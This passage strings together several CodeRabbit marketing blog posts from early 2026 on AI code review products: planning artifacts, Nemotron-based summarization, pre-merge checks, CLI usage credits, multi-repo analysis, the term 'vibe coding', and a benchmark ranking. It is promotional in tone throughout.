is the new assembly-level language. It still matters. Production still runs on it and machines still need it. But for humans, code is increasingly too low-level to be the place where most thinking happens. Its job is changing: code becomes the thing the machine executes. Something else becomes the thing the human understands. That something is the **Plan**. ## **The Plan as system of record** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9c6289be87da4748c350f0317aa60c2b0054e6dd4edf6908605e5b956a3f2449_09fc68f048.png) A good plan captures the *why* before it disappears into the *how*. It records assumptions before they become invisible. It makes tradeoffs legible. It turns constraints into shared context instead of tribal knowledge. It gives humans something they can review, debate, refine, approve, and return to… without reverse-engineering intent from thousands of lines of generated code. This distinction matters most where software work gets genuinely hard. Take the payments migration example: The most important artifact for a staff engineer, a PM, or a security lead isn't the final diff. It's the intent: what must not break, which edge cases are business-critical, how failure should be handled, what tradeoffs were consciously accepted. A plan makes that reviewable before the blast radius becomes real. Or take an incident remediation. After an outage, the worst possible time to reconstruct intent is from code written under pressure. A clear plan-as-record shows what was believed at the time, what mitigations were prioritized, what was deferred, and what "done" actually meant. Or take something like onboarding. A new engineer joining a codebase built heavily with agents over the past year can't just be told to "read the repo." But show them the sequence of plans - what was optimized for, where shortcuts were taken, which constraints came from customers, which assumptions are still open - and confusion becomes understanding. Anywhere the cost of misinterpretation is high, the Plan is more valuable than the implementation details alone. Because the real work isn't generating code. It's preserving meaning. ## **What we're building toward** %[https://www.youtube.com/watch?v=zHlgipben70] The future doesn't belong to prompts, and it doesn't belong to code alone. Prompts are too ephemeral. Code is soon to be too low-level. The durable layer in between, the one humans can actually reason about, is the plan. The plan is where taste lives. It’s where judgment, accountability, and collaboration lives. Code will still be written, more of it than ever. But more and more of that code will be produced by systems faster than us, cheaper than us, and less interested in explaining themselves. If we want software development to remain legible, governable, and collaborative, we need a better artifact for humans to hold onto. That's what we're building with CodeRabbit Issue Planner. [CodeRabbit Issue Planner](https://www.coderabbit.ai/issue-planner) is a tool that helps teams using AI agents plan collaboratively and align intent *before* any code is written. It turns vague issues into shared, reviewable plans and generates editable prompts with context directly from your codebase. But it also functions as a new source of truth that serves as an archive of the choices you made and systems you intended to build. It’s not a nicer prompt box or just another thin wrapper around codegen. It’s a real system of record for intent in the age of agents. Just as a poet looks to their poem as the artifact of what they built, and a chef looks to their dish. In the same way, developers previously looked to code and/or PRs as the artifact they built. But in this new world, it will not be the code. It will be the Plan - the artifact they will say they built. The plan is what developers will point to and say, “This is what we built.” It is what they will share with their teammates to demonstrate their output. It is what they will be evaluated on. The Plan will be the centerpiece of development work going forward. It is what will go out into the world as the last human touchpoint before the machine takes over. ***Issue Planner is part of CodeRabbit's suite of AI-powered developer tools.*** [***Try it today →***](https://coderabbit.link/LpatZEq)

Faster AI code reviews with NVIDIA Nemotron 3 Super

Sahil Mohan Bansal — Wed, 11 Mar 2026 00:00:00 GMT

TL;DR: NVIDIA Nemotron 3 Super delivers high accuracy and faster throughput in CodeRabbit's self-hosted AI code reviews. We are happy to share that CodeRabbit is expanding its support for the [NVIDIA Nemotron](https://research.nvidia.com/labs/nemotron/Nemotron-3/) family of open models, upgrading from Nemotron 3 Nano to **Nemotron 3 Super** for the context gathering and summarization stage of our AI code review workflow. This upgrade is available for CodeRabbit's self-hosted customers running our container image on their own infrastructure. Nemotron 3 Super is used to power the context gathering and summarization stage before the frontier models from OpenAI and Anthropic are used for deep reasoning and generating review comments for bug fixes. With Nemotron Super, that review foundation just got significantly more capable. ## Upgrading from Nano to Super: Faster context gathering at scale We tested Nemotron 3 Super as a follow-up to our initial [support of Nemotron 3 Nano](https://www.coderabbit.ai/blog/coderabbit-ai-code-reviews-now-support-nvidia-nemotron), where we reported that a blend of open and frontier models allows us to improve the overall speed of context gathering and cost efficiency by routing different parts of the review workflow to the appropriate model family especially in the PR Summarization phase of code reviews. Nemotron 3 Super's larger context window and ability to run multi-token prediction (MTP) made it well-suited for the token-hungry task of context summarization. As our code review workflows grow more agentic and complex, we've run into two constraints that Nemotron 3 Super helps to address. **Context explosion:** Multi-agent workflows generate significantly more tokens than standard interactions because each step requires context from tool outputs, intermediate reasoning, repo signals, and more. Over the course of a long review, this volume of context increases cost and risks goal drift. **Thinking tax:** Complex agentic tasks require reasoning at every step, but routing every sub-task to a large frontier model makes the pipeline slow and expensive. The ideal solution is a mix of models where the reasoning model aligns with the type of task without escalating to the heaviest model available. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/84abe8060be9996669e9ee9a553587bd7f2e9700739e1f1f2e00171e8e1e0ef0_feeacf5889.png) *CodeRabbit architecture: using Nemotron Super for context gathering & summarization* This context building stage is the workhorse of the overall AI code review process and it is run several times iteratively throughout the review workflow. [NVIDIA Nemotron 3 Super](https://developer.nvidia.com/blog/introducing-nemotron-3-super-an-open-hybrid-mamba-transformer-moe-for-agentic-reasoning/) helps us with high-efficiency tasks and its large context window (1 million tokens) along with fast speed helps to gather a lot of data and run several iterations of context summarization and retrieval. Running these iterations many times iteratively throughout the code review cycle helps to enhance the review quality and lower the signal-to-noise ratio. ## How Nemotron 3 Super helps with review summaries When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources: * Code and PR index * Linter / Static App Security Tests (SAST) * Code graph * Coding agent rules files * Custom review rules and Learnings * Issue details (Plan details, Jira / Linear / Github tickets) * Public MCP servers * Web search A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b2bfdb4ff7c2cc0f2fb554e501bb0fcb77afcb522bafbd60b6dee29bb30b97ba_c10357a976.png) *PR Summary generated by CodeRabbit, powered by Nemotron 3 Super* Summarization is at the heart of every code review and is the key to delivering high signal-to-noise in the review comments. Nemotron 3 Super is a 120-billion-parameter open model with 12 billion active parameters at inference. Its hybrid Mixture-of-Experts (MoE) architecture with transformer layers handling the reasoning and Mamba layers handling the high-volume, repetitive work of context processing during review summarization, which is critical for our code reviews. Predicting multiple tokens simultaneously also resulted in meaningfully faster inference which speeds up review summarization. All other code review tasks flow downstream from summarization. The faster the review summarization, faster the overall code review. Nemotron Super delivers much faster performance than Nemotron 3 Nano. Nemotron 3 Super can also hold a large codebase context including context from external sources (jira tickets, logs, project requirement docs, etc.) without losing state across long tasks. ## What Super unlocks beyond Nano CodeRabbit now supports Nemotron 3 Super (initially for its self-hosted customers) for the context summarization part of the review workflow, while the frontier models from OpenAI and Anthropic focus on finding hidden bugs. For customers this means faster PR summarization, faster code reviews without compromising quality. We are also delighted to support the [announcement from NVIDIA today](https://nvidianews.nvidia.com/news/nvidia-expands-open-model-families-to-power-the-next-wave-of-agentic-physical-and-healthcare-ai) about the expansion of its Nemotron family of open models and are excited to work with the company to help accelerate AI coding adoption across every industry. [Get in touch](https://www.coderabbit.ai/contact-us/sales) with our team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

Pre-Merge Checks: Built-in & custom PR rules automatically enforced

Konrad Sopala — Wed, 11 Mar 2026 00:00:00 GMT

All development teams claim to have pr standards, which often include requirements like: "Ensure docstrings are added," "Reference the associated issue," and "Avoid logging sensitive information." Defining those standards is easy. Enforcing them consistently as PR volume grows is not. If you’re an admin or team lead, you want your team to follow best practices before merging a PR every time, not just when someone remembers the checklist. If you’re a developer, you want to know immediately when something fails and how to fix it fast so you can merge. Pre-merge Checks make your definition of done enforceable. CodeRabbit evaluates every pull request automatically using built-in validations and custom rules written in plain English. Your baseline expectations come out of the box, and your team-specific guardrails run on every PR without anyone having to remember them. [Pre-Merge Checks](https://docs.coderabbit.ai/pr-reviews/pre-merge-checks) address the gap between simply having guidelines and actually enforcing them. ## What are Pre-Merge Checks? Pre-Merge Checks automatically evaluate a pull request whenever it opens or updates. Instead of relying on reviewers to mentally track every policy, CodeRabbit runs structured checks and reports on what passed, what failed, and what needs attention. %[https://youtu.be/knoETRikfwg] Checks can run in warning mode or error mode. You can introduce guardrails gradually before turning them into merge blockers and slowing developers down. ## Built-In Checks Pre-Merge Checks include built-in validations for common PR requirements most teams already expect. * **Docstring coverage thresholds**: Enforces minimum documentation coverage for new or modified code against a configurable threshold (80% by default). * **PR title validation:** Requires imperative verbs, character limits, or specific formatting conventions. * **PR description validation**: Ensures required sections such as rollout notes or breaking changes exist. * **Linked issue verification:** Confirms the PR references an approved issue or ticket. * **Issue alignment assessment:** Flags when changes extend beyond the scope of the linked issue. These checks remove repetitive review comments and keep standards consistent across contributors. No more extra tooling or manual enforcing policies. ## Custom Checks Every team has rules that do not show up in generic linters. Custom checks let you define those requirements in natural language and enforce them automatically. Examples: * **Sensitive data in logs:** Fails a PR if log statements may include passwords, API keys, tokens, SSNs, or payment data. * **Hardcoded credentials:** Detects live keys or variables like *SECRET,* KEY, or \*\_PASSWORD in non-test files. * **Database migration safeguards:** Requires both up() and down() methods and flags destructive changes without rollback logic. * **Breaking change documentation**: Ensures public API, CLI, environment variable, or schema changes are documented in the PR and reflected in [CHANGELOG.md](http://CHANGELOG.md). * **Language migration policies:** Gradually phases out legacy languages by blocking new files while allowing edits to existing ones. You define the rule once and CodeRabbit evaluates it on every pull request. That’s automated governance without brittle CI scripts or regex hacks. Check out our documentation for further details on [how to write effective instructions](https://docs.coderabbit.ai/pr-reviews/custom-checks#writing-effective-instructions) for Custom checks. ## Flexible configuration You can configure Pre-Merge Checks in the CodeRabbit web interface or commit them to your repository using a .coderabbit.yaml file. That means your PR policies live alongside your code and evolve with it. Example: ```plaintext reviews: pre_merge_checks: docstrings: mode: "error" threshold: 85 title: mode: "warning" requirements: "Start with an imperative verb; keep under 50 characters." description: mode: "error" issue_assessment: mode: "warning" custom_checks: - name: "Undocumented Breaking Changes" mode: "warning" instructions: "All breaking changes to public APIs must be documented in the PR and CHANGELOG.md." ``` You can even introduce new guardrails in a warning state first, allowing your team to adjust. Once the rule is refined and the team is ready, transition it to an error state. Guardrails should evolve naturally with your team's process rather than being implemented abruptly. ## Manual controls You can also trigger checks directly inside a pull request. Run all configured checks: ```plaintext @coderabbitai run pre-merge checks ``` Test a custom rule before saving it: ```plaintext @coderabbitai evaluate custom pre-merge check --name --instructions --mode ``` Override failures when necessary: ```plaintext @coderabbitai ignore pre-merge checks ``` ## Why this matters Without automated enforcement: * Reviewers spend time re-checking predictable requirements * Standards drift across teams * Safeguards depend on memory * High-signal review time gets wasted on hygiene With Pre-Merge Checks: * Standards apply consistently to every PR * Risky patterns get flagged automatically * Breaking changes get documented before merge * Reviewers focus on architecture, tradeoffs, and edge cases Pre-Merge Checks answer one question before code lands: Does this PR meet our standards? If not, you get clear feedback. If it does, you merge with confidence. This transforms informal guidelines into built-in, customizable, and automatic guardrails that are fully enforceable. ## Get started with Pre-Merge Checks Enable Pre-Merge Checks in CodeRabbit and start with one rule your team already cares about like docstrings, breaking changes, migration safety, or title conventions. Run them in warning mode and see what gets flagged. Then move to enforcement when you are ready. Standards are easy to write. Enforcement is what changes behavior. [Try CodeRabbit on your next pull request](https://app.coderabbit.ai/login???free-trial) and see what it catches. Pre-Merge Checks are available for Pro plan users and allow users to configure up to 5 custom checks per organization.

Introducing Usage-Based Add-On. Allow unrestricted access to CodeRabbit CLI through agentic coding loops.

Konrad Sopala — Wed, 11 Mar 2026 00:00:00 GMT

CodeRabbit now supports **unlimited reviews using CLI**, helping you to perfect code while running your agentic coding loops with Claude code, Codex and more! Buy credits, use them at your own pace, and get full control over your CLI usage - right from the [CodeRabbit web interface](https://app.coderabbit.ai/). ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c95e3d2cad19f1e0456017ddb981eca91b8304dfba95d4da7a6d84c53de789a3_1c0aa6888f.png) ## What's New From now on, you can purchase credits to get unrestricted access to CodeRabbit CLI. There are two options available: * **One-Time Purchase** - Buy credits on demand and pay only for what you need and when you need it. Can turn on/off Auto-refill here. * **Auto-refill (set it and forget it)** - Configure a refill threshold and top-off amount, so your CI pipelines and CLI workflows never stall because of an empty balance. * **Monthly Subscription** - Set up a recurring credit top-up and never worry about running out of your credits. You can cancel your subscription any time. Once you start using your credits, you’ll want to know where you stand. The [**Usage-Based Add-On**](https://app.coderabbit.ai/settings/subscription) tab gives you real-time visibility into your credit spend, showing your current balance alongside a spending chart. Credits are simple: $1 gets you one credit, and each reviewed file costs $0.25. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c1d3a6f8784d0cdd2b1bed6d9cd74265106cf6009aeb5ba4337f4b58b7e0e3d_4c40c22102.png) ## Getting Started Here’s a step-by-step setup guide: * **Install CodeRabbit CLI** * Follow the instructions [here](https://docs.coderabbit.ai/cli#getting-started) or simply run this command in your terminal and follow along. ```plaintext curl -fsSL https://cli.coderabbit.ai/install.sh | sh ``` * **Choose your purchase method** * Head to [Account Settings](https://app.coderabbit.ai/settings/team-management) in the CodeRabbit web interface and find [Subscription and Billing](https://app.coderabbit.ai/settings/subscription). You’ll see the Usage-based add-on tab there, where you can choose between a monthly subscription, a one-time purchase or auto-refill. * **Create an Agentic API Key** * Once your purchase is complete, navigate to the [API Keys](https://app.coderabbit.ai/settings/api-keys) section and generate your **Agentic API key**. * **Run CodeRabbit via your AI Agent** * Prompt your agent to run a CodeRabbit CLI code review using the following command: ```plaintext coderabbit –plain --api-key cr-*********** ``` * To avoid passing the key on every command, prompt your agent to authenticate once with your CodeRabbit API key using the following command: ```plaintext coderabbit auth login --api-key cr-************ ``` After logging in, prompt your agent to run a CodeRabbit CLI review without passing the API key again: ```plaintext coderabbit review --plain ``` ## Give it a try %[https://youtu.be/bMItn3G_upQ?si=D5mJu_tFUzXM7N7N] Ready to have unlimited CLI reviews? Head to the [CodeRabbit web interface](https://app.coderabbit.ai/settings/subscription) and grab some credits. Whether you go with a one-time purchase or set up a monthly subscription, you'll be up and running in minutes. And if you run into anything or have feedback, [let us know](https://x.com/coderabbitai). We're building this for you.

Introducing one of the most requested CodeRabbit features: Multi-Repo Analysis.

Konrad Sopala — Fri, 06 Mar 2026 00:00:00 GMT

If you've ever merged a pull request that passed every check, looked clean in review, and then broke a downstream service ten minutes later…you already know the problem. When your architecture spans multiple repos (microservices, shared libraries, separate frontend and backend packages) a change in one place can silently break things in another. A renamed field in your API response schema? Looks great in the PR, but the three services that parse that response have no idea what's coming. This is one of the most common pain points we hear from teams running multi-repo setups and it's been one of the most requested features among our customers. So we built it. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2d37bdb49f279d11fb5d419adc109b33e5056a6a35d2355354ff4dd64f9071b2_05d55ff8a9.png) ## Introducing Multi-Repo Analysis [Multi-Repo analysis](https://docs.coderabbit.ai/integrations/knowledge-base#linked-repositories-cross-repo-review) is a new CodeRabbit feature available to Pro, Pro Plus, and Enterprise tier users that let you connect related repositories so that CodeRabbit pulls context from across all of them during code reviews. Think microservices, shared libraries, API contract changes, or any setup where a change in one repo can quietly break another. More information on linked repositories per plan can be found [here](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis). When a pull request modifies a shared API, type definition, or database schema, CodeRabbit automatically explores your linked repositories for downstream impact. Instead of reviewing changes in isolation, you get the full picture before you merge. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cb69c5e5dcae9ce8bdb50365ba35439183d9366f29748272356493cae815f0bf_e8dcbec371.png) ## Setup & configuration Before you start using it, there are some [platform-specific requirements](https://docs.coderabbit.ai/integrations/knowledge-base#platform-requirements) to go through, to make sure the CodeRabbit bot has read access to all linked repositories:

Platform	Requirement
GitHub	The CodeRabbit GitHub App must be installed on all linked repositories. Inaccessible repositories are skipped, and a warning appears in the review summary.
GitLab	The bot token must have read access. Tokens are typically scoped to the group or instance.
Bitbucket Cloud	The bot token must have read access. Tokens are scoped to the workspace.
Azure DevOps	The PAT must have read access. Tokens are scoped to the organization.

Once that's configured, you can finish the setup in two ways: * **Through the CodeRabbit web interface** * Head to [Repositories](https://app.coderabbit.ai/settings/repositories) section and select a repository that you would like to add a linked repository to * Switch off the *Use Organization Settings* toggle * Go to the [Knowledge Base](https://app.coderabbit.ai/organization/settings?tab=knowledge_base) and find the Linked *Repositories* section. * Add a new linked repository with instructions that will guide CodeRabbit during review. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/446b01cc3fb585b9e7c7af91aee38f1237f063cecf8ec91342ffb1d33afb7619_8ccad5d9f3.png) * **Through YAML configuration** * Add a *linked\_repositories* section under *knowledge\_base* in your [.coderabbit.yaml](https://docs.coderabbit.ai/getting-started/yaml-configuration) file. ```plaintext # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json knowledge_base: linked_repositories: - repository: "myorg/backend-api" instructions: "Contains REST API endpoints and database models" ``` Keep in mind that as of now, each repository configuration supports only one linked repository, though multiple linked repos are planned in the future. For full setup details, check the [docs](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis). ## See it in action If you want a hands-on walkthrough, one of our Developer Advocates put together a tutorial that shows Multi-Repo analysis catching real cross-repo issues in a review. %[https://youtu.be/BrT4rSHhA10?si=FzPUzcBUgqXdHXmZ] ## Try it now A Multi-Repo analysis feature is available today. Connect your repos, open a PR, and let CodeRabbit show you what you've been missing. [Get started](https://app.coderabbit.ai/login)

A semantic history: How the term 'vibe coding' went from a tweet to prod

David Kravets — Thu, 05 Mar 2026 00:00:00 GMT

A year is an eternity in AI time. In February 2025, Andrej Karpathy dropped a [tweet-sized cultural marker](https://x.com/karpathy/status/1886192184808149383) into the software world: “vibe coding.” The phrase stuck because it captured a visceral shift in the developer experience. Instead of grinding through syntax, you describe an intent in plain English, watch the code manifest, and nudge the output until reality matches your vision. In this initial vision of vibe coding, Karpathy famously framed it as engineering where you, “fully give in to the vibes, embrace exponentials, and forget that the code even exists.” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3577a88bff406c83078cedf8934a854f78f5a867a6559e18a5e4c4c3524bd5dc_1d760a4b7e.png) Karpathy’s point wasn't just that AI could help you code. We’ve had copilots for years. The point was that AI made it tempting to treat code as a steerable draft rather than something requiring line-by-line authorship. One year later, the "vibe" has evolved. Vibe coding doesn’t just refer to what we’re doing when coding a hobby project or slapping together a prototype anymore. We are managing an explosion of machine-generated logic destined for production systems, and we’re often calling that vibe coding, too. But is it really vibe coding? And if it’s not, what should we be calling it? And how should we be treating it in production systems? ## The semantic drift: From play to production ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc01cc5aa8918cdfe7781f2e97c9ba7c38b4cc03770cca70a933af10a208ff9f_3947c458b5.jpg) When vibe coding was honored as a 2025 [Word of the Year by Collins Dictionary](https://blog.collinsdictionary.com/language-lovers/collins-word-of-the-year-2025-ai-meets-authenticity-as-society-shifts/), it signaled that the workflow had gone mainstream. But as the phrase broadened, so did the stakes. Vibe coding today has become shorthand for any prompt-driven development, rather than the specific prompting experience Karpathy originally described. This drift isn’t a linguistic accident. More than anything, it’s a signal that many engineering teams have added AI to their stacks and are struggling with the quality of its output and its downstream effects. In fact, the use of vibe coding to describe the generation of code for production-grade systems has taken on somewhat negative connotations. The term was invoked by many precisely to emphasize that, in some cases, relying too much on AI-generated code at work was trusting an LLM’s vibes in a way better suited for a weekend project, rather than for customer-facing applications of a publicly listed company. For example, as AI coding agents were adopted by more teams in 2025, devs on LinkedIn renamed themselves [Vibe Code Cleanup Specialists](https://www.linkedin.com/posts/deveshbhardwajj_ai-startups-engineering-activity-7373218403068788736-VXlT) in their profiles (a joke we ran with for our [AWS Re:invent booth](https://x.com/yoimkonrad/status/2013539187224375400?s=46&t=OXgZw0VC393gp6RVxqzq0A) this year). What’s more, Collins’ competitor Merriam Webster went in another direction for their word of the year choice. They chose [slop](https://www.merriam-webster.com/wordplay/word-of-the-year), highlighting the large gulf that still existed between AI optimism and AI output. Indeed, for many, the promise of AI coding agents have translated into hours spent reviewing AI slop, reworking code [due to unclear prompts or intent](https://www.coderabbit.ai/blog/the-hidden-cost-of-ai-coding-agents-isnt-from-ai-at-all?), and dealing with incidents or bugs in production. As we move from "throwaway weekend projects" (as Karpathy originally described his use of vibe coding) to core infrastructure, the constraints of software development have shifted. We no longer have a creation problem. We have a confidence problem. And that lack of confidence was reflected in how the word came to be used throughout 2025 for almost all uses of AI for coding, even those at work. ## A word under pressure: Why devs both love and hate vibe coding ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2c1fa5c3bb7348b339b46968021d712714883c2fa2068c572936cfc9802912f1_a5ce946607.jpg) Some of the biggest tech companies brag about how a growing amount of their code, if not all, [is written by AI](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated). That can’t be accomplished by simply forcing devs to use AI. Many, if not most devs, appreciate the time and cognitive savings of [using AI agents](https://www.atlassian.com/blog/developer/developer-experience-report-2025) for certain tasks and types of code. But that’s not the full story. For many devs, AI coding agents often actually equal more work, and that’s measurable in how the most experienced people in the room are spending their hours. Fastly’s [recent survey](https://www.fastly.com/blog/senior-developers-ship-more-ai-code) of 791 professional developers illustrates this shift in real-time. The data shows that senior developers are far more likely to ship large amounts of AI-generated code. * **Volume:** Roughly one-third of senior developers report that about half their shipped code is now AI-generated (compared to just 13% of juniors). * **The review tax**: Nearly 30% of senior devs report that editing and auditing AI output offsets most of their initial time savings from AI. This tells us that the most experienced engineers aren't using AI to work less. They are using it to manufacture more complexity, which they then have to manage. That’s not just because they’re coding more. It’s also because reviewing AI code is simply harder. Our own [State of AI vs. Human Code Generation study](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report), for example, found that AI generated code had 1.7x more bugs and issues and 1.4x more critical issues. Today, where it seems like everyone is vibe coding at work, code review is no longer a predictable ritual at the end of a sprint. Now, it is the primary mechanism that makes high-velocity engineering safe. Or, more so, it’s the area where issues and bugs now slip through more frequently and requires significantly more time and attention to get right. In a way, it must feel to some developers like a Faustian bargain. In return for manually writing less code, they’re having to manually review more of it. And those reviews have increasingly become stressful, load bearing stages of the software development lifecycle. But one glance at the surge of headlines about incidents clearly shows that the normal review cycle (and likely senior devs) are breaking under the added load. The difficulty of finding all the additional issues AI generates is leading to a wave of incidents that are suspected to be from or have been traced back to AI-generated code. ## Incidents changed the vibe coding conversation ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3ff1d46f4c8f7d7d067527d16e4dacdbccc5452d3ea00f2273f2c01cfff2f51a_bba1bae02a.png) As AI-generated code moved from prototypes into production systems, incident data began to reflect the strain. Industry outage tracking in early 2025 showed a [measurable spike](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai) in global service disruptions during peak AI adoption months, before stabilizing later in the year. That analysis raised a harder question: not whether AI can generate code, but whether teams are verifying it rigorously enough before it ships. At the same time, teams reported a growing review burden. Faster generation meant more logic to inspect, more edge cases to reason through, and more subtle regressions to catch. When verification practices don’t scale at the same rate as output, small defects are more likely to escape into production. Recent high-profile events reinforced the point. For example, news reports detailed an [AWS disruption](https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-hit-by-least-two-outages-involving-ai-tools-ft-says-2026-02-20/) in which an internal AI coding assistant was involved in changes that contributed to a 13-hour interruption of a cost-management service. While misconfigured access controls, not autonomous AI behavior, were later attributed as the root cause, it was, ultimately, the AI who made the change that took down the system. Similarly, Moonwell recently dealt with an incident that saw it accidentally issue [$1.8 million in bad debt](http://finance.yahoo.com/news/oracle-error-leaves-defi-lender-082155372.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAANRP-C1XZnEqcpitPfwnrBhu46h20KdgmG1GWVmifMnb9gbTRBImfb7BhTM9pFVB-NZJqUxpY3SiPnlPVl4vLKL1LS-uYTKLirpb5NNKQY-V04HTCX3e3jVsJxPSQ-ubBiMlnGWf4503odt6oZb0od3VawMW8LZZMdoAWGnMlzR_) after an incident that many are suggesting was caused by AI-powered development. Kimi chatbot experienced [reliability issues](https://datainnovation.org/2025/01/moonshot-ai-betting-big-on-long-context-confronting-the-challenges-of-scale-and-reliability/) and outages amid surging demand as the company scaled aggressively, highlighting how systems can strain when rapid AI adoption outpaces infrastructure maturity. This is where “vibe coding” shifted in tone further. What began as a playful description of prompt-driven creation took on an even more skeptical edge in production contexts. Not because engineers reject AI leverage, but because incidents make the verification gap visible. When change accelerates without proportional review rigor, risk increases and devs become frustrated. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/956510b81de7b459d29b4d2142aa4d3e64533916f43a0bda83e4b4876cce98a1_6785e30a38.png) ## The rise of ‘agentic engineering’: Vibe maturity or the same slop by another name? Karpathy recently refined his vibe coding thesis, noting that while the vibe started as an exploration, it has matured into what he and others describe as “agentic engineering.” This seems like an attempt on Kaparthy’s part to decouple AI-driven development from the baggage that the term vibe coding carries. But it’s also meant to mark a different kind of workflow that requires a fundamental shift in how we define technical oversight. As Karpathy recently noted on X, the industry is moving toward a model where speed and rigor are no longer mutually exclusive. “Today (1 year later), programming via LLM agents is increasingly becoming a default workflow for professionals, except with more oversight and scrutiny. The goal is to claim the leverage from the use of agents but without any compromise on the quality of the software,” Karpathy recently [wrote](https://x.com/karpathy/status/2019137879310836075) on X. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ac27503f58b445c68618a9d9eb8e9c6648f216e8936a15db7052ae565392dd5e_8ec9b8237a.png) This new paradigm is meant as a distinction from the vibe coding era. The job is no longer to coach the model or to vibe with it but to plan for and verify its logic. Whether “agentic engineering” will catch on as the main way to describe AI-driven development or whether the derogatory use of vibe coding in a professional context will continue remains to be seen. ## What’s next for vibe coding? The future of the word and working style Here’s the optimistic reading of the last year. Vibe coding didn’t break engineering, even if it did increase incidents. Instead, it forced us to define what the craft actually is and imagine how it might evolve in the coming years. That’s led some to talk about how we’re on the cusp of a new [golden age of software engineering](https://newsletter.pragmaticengineer.com/p/the-third-golden-age-of-software), and others to proclaim that [developers are dead](https://www.coderabbit.ai/blog/developers-are-dead-long-live-developers). Whether autonomous agents will ever replace developers is still highly contested. But what’s crystal clear is that the future of vibe coding as a word is entirely dependent on solving the quality problem AI-driven development currently faces. That’s the only way that “vibe coding” is set to become less derogatory and have a chance of evolving into Karpathy’s preferred term for it: “agentic engineering.” But to get there, we’ll need to adopt and perform rigorous “vibe checks” as an industry (that’s our suggestion for the 2026 word of the year, if you’re listening Collins and Merriam Webster). In its original cultural context, a vibe check is a gut-check, a moment of scrutiny to see if something is as real as it claims. At CodeRabbit, we first used this term in May 2025 to describe how our AI code reviews can help ensure your code’s quality. In 2026, it’s our belief that rigorous vibe checks must become a technical standard. The same tipping points we saw around the adoption of agentic AI in 2025 must happen in 2026 around tools that are focused on verifying and testing AI generated code. These vibe checks can include a number of different safeguards and systems designed to keep AI slop and issues from interfering with your production system, including things like AI code review. A vibe check is, essentially, your quality gate, something AI code makes more critical than ever before. We might have fallen in love with vibe coding because it named a feeling, the thrill of code appearing faster than the brain can keep up. But going forward, we need less vibing and more checking. That’s the only way vibe coding grows up. ***Need a vibe check?*** [***Try CodeRabbit free today.***](https://coderabbit.link/Gg1HxjW)

CodeRabbit tops the first independent AI code review benchmark

Sahil Mohan Bansal — Tue, 03 Mar 2026 00:00:00 GMT

AI code review benchmarks have mostly been published by other code review vendors (whose tools always seem to come out on top in their benchmarks). We've [written before](https://www.coderabbit.ai/blog/framework-for-evaluating-ai-code-review-tools) about why we don’t think vendor generated benchmarks provide the credibility developers actually need when choosing an AI tool. So, we’re glad to see that someone has finally built the first independent benchmark covering nearly 300,000+ real-world PRs reviewed by CodeRabbit. Martian's [Code Review Bench](https://codereview.withmartian.com/) is the first independent public benchmark to evaluate AI code review tools using real developer behavior and CodeRabbit comes out on top. Their leaderboard shows **CodeRabbit has the highest recall** of any tool, almost 15% more than the next closest tool. In plain terms: **CodeRabbit finds more real bugs** than anyone else. CodeRabbit also tops the overall chart with the **highest F1 score** (balance of precision/recall), with **a 51.2% score**, more than any other code review tool. Precision refers to the accuracy of a tool. Recall refers to the comprehensiveness of a tool CodeRabbit balances both and delivers the most accurate AI code reviews. [![Code Review Benchmark by Martian](https://victorious-bubble-f69a016683.media.strapiapp.com/d0b6120fcf5fa75443d317abac36b89a33ae95f006465661dc27d7260ae9d03c_f066dc5668.png)](https://codereview.withmartian.com/) *Code Review Bench results: y-axis shows the recall rate, x-axis shows the precision* ### What is Code Review Bench? [Code Review Bench](https://withmartian.com/post/code-review-bench-v0) is a new benchmark published by [Martian](https://withmartian.com), a research lab with team members from DeepMind, Anthropic, and Meta. They evaluated 10 tools across approximately hundreds of thousands of PRs. Their [methodology and code](https://github.com/withmartian/crb) are fully open source. What makes Code Review Bench different from previously published code review benchmarks is their two-pronged approach involving real-world data from developers and a base gold set of known bugs to look for. * **Online benchmark:** analyzes code review comments that developers actually accept or reject across open source repos. When a developer fixes an issue found by a code review tool, that's a signal that the review comment was useful. When they ignore it, that's valuable data, too. * **Offline benchmark:** runs every code review tool on the same 50 PRs and analyzes them against a curated set of previously identified bugs called the “gold set.” This is a controlled but influenced comparison where human annotation is required to classify a review comment as a real bug or a false positive. ### Code Review Bench Results In the online benchmark that’s grounded in real developer behavior, and the one Code Review Bench itself calls the headline metric, CodeRabbit ranks **#1 in F1 score** (harmonic mean of precision and recall) among all 10 tools included. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/d11b748ce50e365cbd85f464cc5dc240b380c1d224ce52aa03a23791a550ae4b_f8a7918315.png)](https://codereview.withmartian.com/) *Code Review Bench results analyzed from Jan-Feb 2026* Martian measured CodeRabbit's reviews **across nearly 300,000 pull requests** over a 2 month period, one of the largest sample in the dataset. That represents tens of thousands of developers, on real projects, deciding whether to act on what we flagged. Developers act on CodeRabbit's suggestions at a meaningful rate. Its 49.2% precision means roughly one in two comments leads to a code change. This, combined with a higher recall rate than any other tool, leads to the highest F1 score among all tools. ### 